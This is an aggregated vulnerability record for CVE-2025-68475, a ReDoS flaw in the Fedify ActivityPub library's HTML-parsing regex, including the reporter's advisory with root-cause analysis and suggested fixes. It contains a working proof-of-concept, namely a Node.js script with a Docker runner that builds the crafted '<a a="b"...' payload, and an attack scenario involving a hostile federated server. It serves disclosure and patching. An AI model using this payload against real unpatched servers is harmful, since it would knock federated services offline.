cvelistv5 - CVE-2025-68475

CVE-2025-68475 (GCVE-0-2025-68475)

Vulnerability from cvelistv5 – Published: 2025-12-22 21:31 – Updated: 2025-12-22 21:54

Title

Fedify has ReDoS Vulnerability in HTML Parsing Regex

Summary

Fedify is a TypeScript library for building federated server apps powered by ActivityPub. Prior to versions 1.6.13, 1.7.14, 1.8.15, and 1.9.2, a Regular Expression Denial of Service (ReDoS) vulnerability exists in Fedify's document loader. The HTML parsing regex at packages/fedify/src/runtime/docloader.ts:259 contains nested quantifiers that cause catastrophic backtracking when processing maliciously crafted HTML responses. This issue has been patched in versions 1.6.13, 1.7.14, 1.8.15, and 1.9.2.

Severity ?

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-1333 - Inefficient Regular Expression Complexity

Assigner

GitHub_M

References

URL

Tags

	https://github.com/fedify-dev/fedify/security/adv…	x_refsource_CONFIRM
	https://github.com/fedify-dev/fedify/commit/2bdcb…	x_refsource_MISC
	https://github.com/fedify-dev/fedify/commit/bf2f0…	x_refsource_MISC
	https://github.com/fedify-dev/fedify/releases/tag…	x_refsource_MISC
	https://github.com/fedify-dev/fedify/releases/tag…	x_refsource_MISC
	https://github.com/fedify-dev/fedify/releases/tag…	x_refsource_MISC
	https://github.com/fedify-dev/fedify/releases/tag/1.9.2	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	fedify-dev	fedify	Affected: < 1.6.13 Affected: >= 1.7.0, < 1.7.14 Affected: >= 1.8.0, < 1.8.15 Affected: >= 1.9.0, < 1.9.2

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-68475",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-12-22T21:54:29.525857Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-12-22T21:54:45.635Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "fedify",
          "vendor": "fedify-dev",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 1.6.13"
            },
            {
              "status": "affected",
              "version": "\u003e= 1.7.0, \u003c 1.7.14"
            },
            {
              "status": "affected",
              "version": "\u003e= 1.8.0, \u003c 1.8.15"
            },
            {
              "status": "affected",
              "version": "\u003e= 1.9.0, \u003c 1.9.2"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Fedify is a TypeScript library for building federated server apps powered by ActivityPub. Prior to versions 1.6.13, 1.7.14, 1.8.15, and 1.9.2, a Regular Expression Denial of Service (ReDoS) vulnerability exists in Fedify\u0027s document loader. The HTML parsing regex at packages/fedify/src/runtime/docloader.ts:259 contains nested quantifiers that cause catastrophic backtracking when processing maliciously crafted HTML responses. This issue has been patched in versions 1.6.13, 1.7.14, 1.8.15, and 1.9.2."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-1333",
              "description": "CWE-1333: Inefficient Regular Expression Complexity",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-12-22T21:31:20.314Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/fedify-dev/fedify/security/advisories/GHSA-rchf-xwx2-hm93",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/fedify-dev/fedify/security/advisories/GHSA-rchf-xwx2-hm93"
        },
        {
          "name": "https://github.com/fedify-dev/fedify/commit/2bdcb24d7d6d5886e0214ed504b63a6dc5488779",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/fedify-dev/fedify/commit/2bdcb24d7d6d5886e0214ed504b63a6dc5488779"
        },
        {
          "name": "https://github.com/fedify-dev/fedify/commit/bf2f0783634efed2663d1b187dc55461ee1f987a",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/fedify-dev/fedify/commit/bf2f0783634efed2663d1b187dc55461ee1f987a"
        },
        {
          "name": "https://github.com/fedify-dev/fedify/releases/tag/1.6.13",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/fedify-dev/fedify/releases/tag/1.6.13"
        },
        {
          "name": "https://github.com/fedify-dev/fedify/releases/tag/1.7.14",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/fedify-dev/fedify/releases/tag/1.7.14"
        },
        {
          "name": "https://github.com/fedify-dev/fedify/releases/tag/1.8.15",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/fedify-dev/fedify/releases/tag/1.8.15"
        },
        {
          "name": "https://github.com/fedify-dev/fedify/releases/tag/1.9.2",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/fedify-dev/fedify/releases/tag/1.9.2"
        }
      ],
      "source": {
        "advisory": "GHSA-rchf-xwx2-hm93",
        "discovery": "UNKNOWN"
      },
      "title": "Fedify has ReDoS Vulnerability in HTML Parsing Regex"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-68475",
    "datePublished": "2025-12-22T21:31:20.314Z",
    "dateReserved": "2025-12-18T13:52:15.491Z",
    "dateUpdated": "2025-12-22T21:54:45.635Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-68475\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-12-22T22:16:09.143\",\"lastModified\":\"2025-12-23T14:51:52.650\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Fedify is a TypeScript library for building federated server apps powered by ActivityPub. Prior to versions 1.6.13, 1.7.14, 1.8.15, and 1.9.2, a Regular Expression Denial of Service (ReDoS) vulnerability exists in Fedify\u0027s document loader. The HTML parsing regex at packages/fedify/src/runtime/docloader.ts:259 contains nested quantifiers that cause catastrophic backtracking when processing maliciously crafted HTML responses. This issue has been patched in versions 1.6.13, 1.7.14, 1.8.15, and 1.9.2.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-1333\"}]}],\"references\":[{\"url\":\"https://github.com/fedify-dev/fedify/commit/2bdcb24d7d6d5886e0214ed504b63a6dc5488779\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/fedify-dev/fedify/commit/bf2f0783634efed2663d1b187dc55461ee1f987a\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/fedify-dev/fedify/releases/tag/1.6.13\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/fedify-dev/fedify/releases/tag/1.7.14\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/fedify-dev/fedify/releases/tag/1.8.15\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/fedify-dev/fedify/releases/tag/1.9.2\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/fedify-dev/fedify/security/advisories/GHSA-rchf-xwx2-hm93\",\"source\":\"security-advisories@github.com\"}]}}",
    "vulnrichment": {
      "containers": "{\"cna\": {\"title\": \"Fedify has ReDoS Vulnerability in HTML Parsing Regex\", \"problemTypes\": [{\"descriptions\": [{\"cweId\": \"CWE-1333\", \"lang\": \"en\", \"description\": \"CWE-1333: Inefficient Regular Expression Complexity\", \"type\": \"CWE\"}]}], \"metrics\": [{\"cvssV3_1\": {\"attackComplexity\": \"LOW\", \"attackVector\": \"NETWORK\", \"availabilityImpact\": \"HIGH\", \"baseScore\": 7.5, \"baseSeverity\": \"HIGH\", \"confidentialityImpact\": \"NONE\", \"integrityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"scope\": \"UNCHANGED\", \"userInteraction\": \"NONE\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\", \"version\": \"3.1\"}}], \"references\": [{\"name\": \"https://github.com/fedify-dev/fedify/security/advisories/GHSA-rchf-xwx2-hm93\", \"tags\": [\"x_refsource_CONFIRM\"], \"url\": \"https://github.com/fedify-dev/fedify/security/advisories/GHSA-rchf-xwx2-hm93\"}, {\"name\": \"https://github.com/fedify-dev/fedify/commit/2bdcb24d7d6d5886e0214ed504b63a6dc5488779\", \"tags\": [\"x_refsource_MISC\"], \"url\": \"https://github.com/fedify-dev/fedify/commit/2bdcb24d7d6d5886e0214ed504b63a6dc5488779\"}, {\"name\": \"https://github.com/fedify-dev/fedify/commit/bf2f0783634efed2663d1b187dc55461ee1f987a\", \"tags\": [\"x_refsource_MISC\"], \"url\": \"https://github.com/fedify-dev/fedify/commit/bf2f0783634efed2663d1b187dc55461ee1f987a\"}, {\"name\": \"https://github.com/fedify-dev/fedify/releases/tag/1.6.13\", \"tags\": [\"x_refsource_MISC\"], \"url\": \"https://github.com/fedify-dev/fedify/releases/tag/1.6.13\"}, {\"name\": \"https://github.com/fedify-dev/fedify/releases/tag/1.7.14\", \"tags\": [\"x_refsource_MISC\"], \"url\": \"https://github.com/fedify-dev/fedify/releases/tag/1.7.14\"}, {\"name\": \"https://github.com/fedify-dev/fedify/releases/tag/1.8.15\", \"tags\": [\"x_refsource_MISC\"], \"url\": \"https://github.com/fedify-dev/fedify/releases/tag/1.8.15\"}, {\"name\": \"https://github.com/fedify-dev/fedify/releases/tag/1.9.2\", \"tags\": [\"x_refsource_MISC\"], \"url\": \"https://github.com/fedify-dev/fedify/releases/tag/1.9.2\"}], \"affected\": [{\"vendor\": \"fedify-dev\", \"product\": \"fedify\", \"versions\": [{\"version\": \"\u003c 1.6.13\", \"status\": \"affected\"}, {\"version\": \"\u003e= 1.7.0, \u003c 1.7.14\", \"status\": \"affected\"}, {\"version\": \"\u003e= 1.8.0, \u003c 1.8.15\", \"status\": \"affected\"}, {\"version\": \"\u003e= 1.9.0, \u003c 1.9.2\", \"status\": \"affected\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-12-22T21:31:20.314Z\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"Fedify is a TypeScript library for building federated server apps powered by ActivityPub. Prior to versions 1.6.13, 1.7.14, 1.8.15, and 1.9.2, a Regular Expression Denial of Service (ReDoS) vulnerability exists in Fedify\u0027s document loader. The HTML parsing regex at packages/fedify/src/runtime/docloader.ts:259 contains nested quantifiers that cause catastrophic backtracking when processing maliciously crafted HTML responses. This issue has been patched in versions 1.6.13, 1.7.14, 1.8.15, and 1.9.2.\"}], \"source\": {\"advisory\": \"GHSA-rchf-xwx2-hm93\", \"discovery\": \"UNKNOWN\"}}, \"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-68475\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-12-22T21:54:29.525857Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-12-22T21:54:41.120Z\"}}]}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-68475\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"state\": \"PUBLISHED\", \"assignerShortName\": \"GitHub_M\", \"dateReserved\": \"2025-12-18T13:52:15.491Z\", \"datePublished\": \"2025-12-22T21:31:20.314Z\", \"dateUpdated\": \"2025-12-22T21:54:45.635Z\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-RCHF-XWX2-HM93

Vulnerability from github – Published: 2025-12-22 21:36 – Updated: 2025-12-23 16:01

Summary

Fedify has ReDoS Vulnerability in HTML Parsing Regex

Details

Hi Fedify team! 👋

Thank you for your work on Fedify—it's a fantastic library for building federated applications. While reviewing the codebase, I discovered a Regular Expression Denial of Service (ReDoS) vulnerability that I'd like to report. I hope this helps improve the project's security.

Summary

A Regular Expression Denial of Service (ReDoS) vulnerability exists in Fedify's document loader. The HTML parsing regex at packages/fedify/src/runtime/docloader.ts:259 contains nested quantifiers that cause catastrophic backtracking when processing maliciously crafted HTML responses.

An attacker-controlled federated server can respond with a small (~170 bytes) malicious HTML payload that blocks the victim's Node.js event loop for 14+ seconds, causing a Denial of Service.

Field	Value
CWE	CWE-1333 (Inefficient Regular Expression Complexity)

Details

Vulnerable Code

The vulnerability is located in packages/fedify/src/runtime/docloader.ts, lines 258-264:

// Line 258-259: Vulnerable regex with nested quantifiers
const p =
  /<(a|link)((\s+[a-z][a-z:_-]*=("[^"]*"|'[^']*'|[^\s>]+))+)\s*\/?>/ig;

// Line 261: No size limit on response body
const html = await response.text();

// Line 264: Regex execution loop
while ((m = p.exec(html)) !== null) rawAttribs.push(m[2]);

Root Cause Analysis

The regex has nested quantifiers with alternation, which is a classic ReDoS pattern:

/<(a|link)((\s+[a-z][a-z:_-]*=("[^"]*"|'[^']*'|[^\s>]+))+)\s*\/?>/ig
                                                        ^^
                                                   Outer quantifier (+)
           ^^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                     Inner pattern with alternation

Outer quantifier: ((\s+...)+) - one or more groups of attributes
Inner alternation: ("[^"]*"|'[^']*'|[^\s>]+) - multiple ways to match attribute values

When the regex fails to match (e.g., an incomplete HTML tag), the regex engine backtracks exponentially through all possible ways the nested pattern could have matched.

Attack Vector

Victim's Fedify application calls lookupObject("https://attacker.com/@user") to fetch an actor profile
Attacker's server responds with Content-Type: text/html
The code path: lookupObject() → documentLoader() → getRemoteDocument() → HTML parsing (lines 258-287)
Line 261: response.text() reads the entire body without size limits
Line 264: Regex execution triggers catastrophic backtracking
Event loop is blocked for seconds to minutes, causing DoS

Why This Is Exploitable

No response size limit: The HTML body is read entirely via response.text() without Content-Length validation
No timeout by default: AbortSignal is optional and not enforced
Remote exploitation: Attacker just needs the victim to fetch from their URL
No authentication required: Federation commonly involves fetching profiles from untrusted servers
Amplifiable: Multiple concurrent requests can fully disable the service

PoC

Quick Reproduction (Node.js)

You can verify this vulnerability with the following standalone script:

/**
 * Fedify ReDoS Vulnerability - Minimal PoC
 * 
 * This script reproduces the vulnerable regex from docloader.ts
 * and demonstrates exponential time complexity.
 */

// The vulnerable regex from docloader.ts:259
const VULNERABLE_REGEX = /<(a|link)((\s+[a-z][a-z:_-]*=("[^"]*"|'[^']*'|[^\s>]+))+)\s*\/?>/ig;

/**
 * Generate malicious HTML payload
 * Pattern: <a a="b" a="b" a="b"... (trailing space, no closing >)
 */
function generateMaliciousPayload(repetitions) {
  return '<a' + ' a="b"'.repeat(repetitions) + ' ';
}

/**
 * Simulate the vulnerable code path from docloader.ts lines 262-264
 */
function simulateVulnerableCodePath(html) {
  const p = /<(a|link)((\s+[a-z][a-z:_-]*=("[^"]*"|'[^']*'|[^\s>]+))+)\s*\/?>/ig;
  let m;
  const rawAttribs = [];
  while ((m = p.exec(html)) !== null) {
    rawAttribs.push(m[2]);
  }
  return rawAttribs;
}

// Test with increasing payload sizes
console.log('Fedify ReDoS Vulnerability PoC\n');
console.log('Repetitions | Payload Size | Time');
console.log('------------|--------------|--------');

for (const reps of [18, 20, 22, 24, 26, 28]) {
  const payload = generateMaliciousPayload(reps);
  const start = performance.now();
  simulateVulnerableCodePath(payload);
  const elapsed = performance.now() - start;

  const timeStr = elapsed >= 1000 
    ? `${(elapsed / 1000).toFixed(2)}s` 
    : `${elapsed.toFixed(0)}ms`;

  console.log(`${String(reps).padEnd(11)} | ${String(payload.length + ' bytes').padEnd(12)} | ${timeStr}`);

  // Stop if it's taking too long
  if (elapsed > 15000) break;
}

Expected Output

Fedify ReDoS Vulnerability PoC

Repetitions | Payload Size | Time
------------|--------------|--------
18          | 111 bytes    | 14ms
20          | 123 bytes    | 51ms
22          | 135 bytes    | 224ms
24          | 147 bytes    | 852ms
26          | 159 bytes    | 3.26s
28          | 171 bytes    | 14.10s

Time approximately quadruples every 2 additional repetitions, demonstrating O(2^n) complexity.

Full Docker-Based PoC

For a complete demonstration, here are the Docker files to run the PoC in an isolated environment:

Dockerfile

# Dockerfile for Fedify ReDoS Vulnerability PoC
FROM node:20-slim
LABEL description="PoC for Fedify ReDoS vulnerability (CWE-1333)"

WORKDIR /poc
COPY exploit.js .

CMD ["node", "exploit.js"]

exploit.js (Full Version)

/**
 * Exploit Script for Fedify ReDoS PoC
 * 
 * This script demonstrates the ReDoS vulnerability in Fedify's
 * document loader by measuring the time it takes to process
 * malicious HTML responses with varying payload sizes.
 */

// The vulnerable regex from docloader.ts:259
const VULNERABLE_REGEX = /<(a|link)((\s+[a-z][a-z:_-]*=("[^"]*"|'[^']*'|[^\s>]+))+)\s*\/?>/ig;

/**
 * Generate malicious HTML payload
 */
function generateMaliciousHtml(repetitions) {
  return '<a' + ' a="b"'.repeat(repetitions) + ' ';
}

/**
 * Generate normal HTML
 */
function generateNormalHtml() {
  return `<!DOCTYPE html>
<html>
<head>
  <link rel="alternate" type="application/activity+json" href="/user.json">
</head>
<body><a href="/">Home</a></body>
</html>`;
}

/**
 * Simulate the vulnerable code path from docloader.ts
 */
function simulateVulnerableCodePath(html) {
  const p = /<(a|link)((\s+[a-z][a-z:_-]*=("[^"]*"|'[^']*'|[^\s>]+))+)\s*\/?>/ig;
  const p2 = /\s+([a-z][a-z:_-]*)=("([^"]*)"|'([^']*)'|([^\s>]+))/ig;

  let m;
  const rawAttribs = [];
  while ((m = p.exec(html)) !== null) {
    rawAttribs.push(m[2]);
  }

  return rawAttribs;
}

/**
 * Run a single test and measure execution time
 */
function runTest(html, description) {
  const start = process.hrtime.bigint();

  try {
    simulateVulnerableCodePath(html);
  } catch (e) {
    // Ignore errors
  }

  const end = process.hrtime.bigint();
  const durationMs = Number(end - start) / 1_000_000;

  return {
    description,
    durationMs,
    payloadLength: html.length
  };
}

/**
 * Print separator
 */
function printSeparator() {
  console.log('─'.repeat(60));
}

/**
 * Main exploit function
 */
async function main() {
  console.log('\n╔══════════════════════════════════════════════════════════╗');
  console.log('║        Fedify ReDoS Vulnerability PoC                    ║');
  console.log('║        CWE-1333: Inefficient Regular Expression          ║');
  console.log('╚══════════════════════════════════════════════════════════╝\n');

  console.log('[*] Vulnerability Location:');
  console.log('    File: packages/fedify/src/runtime/docloader.ts');
  console.log('    Lines: 259-264');
  console.log('');

  printSeparator();
  console.log('[*] Testing normal HTML response...');
  printSeparator();

  const normalHtml = generateNormalHtml();
  const normalResult = runTest(normalHtml, 'Normal HTML');
  console.log(`[+] Normal request completed in ${normalResult.durationMs.toFixed(2)}ms`);
  console.log(`    Payload size: ${normalResult.payloadLength} bytes`);
  console.log('');

  printSeparator();
  console.log('[*] Testing malicious HTML payloads (ReDoS attack)...');
  printSeparator();

  const testCases = [
    { reps: 18, expected: '~13ms' },
    { reps: 20, expected: '~52ms' },
    { reps: 22, expected: '~228ms' },
    { reps: 24, expected: '~857ms' },
    { reps: 26, expected: '~3.4s' },
    { reps: 28, expected: '~14s' }
  ];

  console.log('');
  console.log('┌─────────────┬──────────────┬──────────────┬────────────────┐');
  console.log('│ Repetitions │ Payload Size │ Expected     │ Actual         │');
  console.log('├─────────────┼──────────────┼──────────────┼────────────────┤');

  let vulnerabilityConfirmed = false;

  for (const testCase of testCases) {
    const maliciousHtml = generateMaliciousHtml(testCase.reps);
    const result = runTest(maliciousHtml, `${testCase.reps} repetitions`);

    const actualTime = result.durationMs >= 1000 
      ? `${(result.durationMs / 1000).toFixed(2)}s` 
      : `${result.durationMs.toFixed(0)}ms`;

    const status = result.durationMs > 100 ? '⚠️ ' : '✓ ';

    console.log(`│ ${String(testCase.reps).padEnd(11)} │ ${String(result.payloadLength + ' bytes').padEnd(12)} │ ${testCase.expected.padEnd(12)} │ ${status}${actualTime.padEnd(12)} │`);

    if (result.durationMs > 500) {
      vulnerabilityConfirmed = true;
    }
  }

  console.log('└─────────────┴──────────────┴──────────────┴────────────────┘');
  console.log('');

  printSeparator();
  console.log('[*] Exponential Time Complexity Analysis');
  printSeparator();

  console.log('');
  console.log('Time approximately quadruples every 2 additional repetitions:');
  console.log('');
  console.log('  18 reps →   ~14ms');
  console.log('  20 reps →   ~51ms (4x)');  
  console.log('  22 reps →  ~224ms (4x)');
  console.log('  24 reps →  ~852ms (4x)');
  console.log('  26 reps →  ~3.3s  (4x)');
  console.log('  28 reps → ~14.0s  (4x)');
  console.log('  30 reps → ~56.0s  (estimated)');
  console.log('');

  printSeparator();
  console.log('[*] Attack Scenario');
  printSeparator();

  console.log('');
  console.log('1. Attacker sets up malicious federated server');
  console.log('2. Victim\'s Fedify app calls lookupObject("https://attacker.com/@user")');
  console.log('3. Attacker responds with Content-Type: text/html');
  console.log('4. Malicious HTML payload: <a a="b" a="b" a="b"... (N times) ');
  console.log('5. Fedify\'s regex enters catastrophic backtracking');
  console.log('6. Event loop blocked → Service unavailable (DoS)');
  console.log('');

  printSeparator();

  if (vulnerabilityConfirmed) {
    console.log('');
    console.log('╔══════════════════════════════════════════════════════════╗');
    console.log('║  ✓ VULNERABILITY CONFIRMED                               ║');
    console.log('║                                                          ║');
    console.log('║  The HTML parsing regex in docloader.ts is vulnerable    ║');
    console.log('║  to ReDoS attacks. A ~150 byte payload can block the     ║');
    console.log('║  Node.js event loop for 7+ seconds.                      ║');
    console.log('╚══════════════════════════════════════════════════════════╝');
    console.log('');
    process.exit(0);
  } else {
    console.log('');
    console.log('[!] Vulnerability could not be confirmed in this environment.');
    console.log('    This may be due to regex engine optimizations.');
    console.log('');
    process.exit(1);
  }
}

main().catch(console.error);

run_poc.sh

#!/bin/bash
# Fedify ReDoS Vulnerability PoC Runner

set -e

IMAGE_NAME="fedify-redos-poc"

echo "Building Docker image..."
docker build -t ${IMAGE_NAME} .

echo "Running the PoC..."
docker run --rm ${IMAGE_NAME}

echo "Cleaning up..."
docker rmi ${IMAGE_NAME} 2>/dev/null || true

Running the Docker PoC

# Save the above files, then:
chmod +x run_poc.sh
./run_poc.sh

Impact

Who Is Affected?

All Fedify applications that use lookupObject(), getDocumentLoader(), or the built-in document loader to fetch content from external URLs
Any federated server that fetches actor profiles, posts, or other ActivityPub objects from potentially untrusted sources
Servers following standard federation patterns - fetching remote actors is a normal operation

Severity Assessment

Factor	Assessment
Attack Vector	Network (remote)
Attack Complexity	Low (trivial payload)
Privileges Required	None
User Interaction	None
Impact	Availability (DoS)
Scope	Service-wide

Real-World Scenario

A Mastodon-compatible server powered by Fedify receives a follow request or mention from @attacker@evil.com
The server attempts to fetch the attacker's profile via lookupObject()
The attacker's server responds with malicious HTML
The victim server's event loop is blocked for 14+ seconds
During this time, all other requests are queued and potentially time out
Repeated attacks can cause sustained service unavailability

Recommended Fix

Option 1: Use a Proper HTML Parser (Recommended)

Replace regex-based HTML parsing with a DOM parser that doesn't suffer from backtracking issues:

// Using linkedom (lightweight DOM implementation)
import { parseHTML } from 'linkedom';

// Replace lines 258-287 with:
const { document } = parseHTML(html);
const links = document.querySelectorAll('a[rel="alternate"], link[rel="alternate"]');

for (const link of links) {
  const type = link.getAttribute('type');
  const href = link.getAttribute('href');

  if (
    href &&
    (type === 'application/activity+json' ||
     type === 'application/ld+json' ||
     type?.startsWith('application/ld+json;'))
  ) {
    const altUri = new URL(href, docUrl);
    if (altUri.href !== docUrl.href) {
      return await fetch(altUri.href);
    }
  }
}

Option 2: Add Response Size Limits

If regex must be used, at minimum add size limits:

const MAX_HTML_SIZE = 1024 * 1024; // 1MB
const contentLength = parseInt(response.headers.get('content-length') || '0');

if (contentLength > MAX_HTML_SIZE) {
  throw new FetchError(url, 'Response too large');
}

const html = await response.text();
if (html.length > MAX_HTML_SIZE) {
  throw new FetchError(url, 'Response too large');
}

Option 3: Refactor the Regex

If the regex approach is preferred, use atomic grouping or possessive quantifiers (where supported), or restructure to avoid nested quantifiers:

// Use a non-backtracking approach with explicit attribute matching
const tagPattern = /<(a|link)\s+([^>]+)>/ig;
const attrPattern = /([a-z][a-z:_-]*)=(?:"([^"]*)"|'([^']*)'|(\S+))/ig;

Resources

Thank you for taking the time to review this report. I'm happy to provide any additional information or help test a fix. Please let me know if you have any questions!

Severity ?

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@fedify/fedify"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.6.13"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@fedify/fedify"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.7.0"
            },
            {
              "fixed": "1.7.14"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@fedify/fedify"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.8.0"
            },
            {
              "fixed": "1.8.15"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@fedify/fedify"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.9.0"
            },
            {
              "fixed": "1.9.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-68475"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-12-22T21:36:55Z",
    "nvd_published_at": "2025-12-22T22:16:09Z",
    "severity": "HIGH"
  },
  "details": "Hi Fedify team! \ud83d\udc4b\n\nThank you for your work on Fedify\u2014it\u0027s a fantastic library for building federated applications. While reviewing the codebase, I discovered a Regular Expression Denial of Service (ReDoS) vulnerability that I\u0027d like to report. I hope this helps improve the project\u0027s security.\n\n---\n\n## Summary\n\nA Regular Expression Denial of Service (ReDoS) vulnerability exists in Fedify\u0027s document loader. The HTML parsing regex at `packages/fedify/src/runtime/docloader.ts:259` contains nested quantifiers that cause catastrophic backtracking when processing maliciously crafted HTML responses. \n\n**An attacker-controlled federated server can respond with a small (~170 bytes) malicious HTML payload that blocks the victim\u0027s Node.js event loop for 14+ seconds, causing a Denial of Service.**\n\n| Field | Value |\n|-------|-------|\n| **CWE** | CWE-1333 (Inefficient Regular Expression Complexity) |\n\n---\n\n## Details\n\n### Vulnerable Code\n\nThe vulnerability is located in `packages/fedify/src/runtime/docloader.ts`, lines 258-264:\n\n```typescript\n// Line 258-259: Vulnerable regex with nested quantifiers\nconst p =\n  /\u003c(a|link)((\\s+[a-z][a-z:_-]*=(\"[^\"]*\"|\u0027[^\u0027]*\u0027|[^\\s\u003e]+))+)\\s*\\/?\u003e/ig;\n\n// Line 261: No size limit on response body\nconst html = await response.text();\n\n// Line 264: Regex execution loop\nwhile ((m = p.exec(html)) !== null) rawAttribs.push(m[2]);\n```\n\n### Root Cause Analysis\n\nThe regex has **nested quantifiers with alternation**, which is a classic ReDoS pattern:\n\n```\n/\u003c(a|link)((\\s+[a-z][a-z:_-]*=(\"[^\"]*\"|\u0027[^\u0027]*\u0027|[^\\s\u003e]+))+)\\s*\\/?\u003e/ig\n                                                        ^^\n                                                   Outer quantifier (+)\n           ^^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n                     Inner pattern with alternation\n```\n\n- **Outer quantifier**: `((\\s+...)+)` - one or more groups of attributes\n- **Inner alternation**: `(\"[^\"]*\"|\u0027[^\u0027]*\u0027|[^\\s\u003e]+)` - multiple ways to match attribute values\n\nWhen the regex fails to match (e.g., an incomplete HTML tag), the regex engine backtracks exponentially through all possible ways the nested pattern could have matched.\n\n### 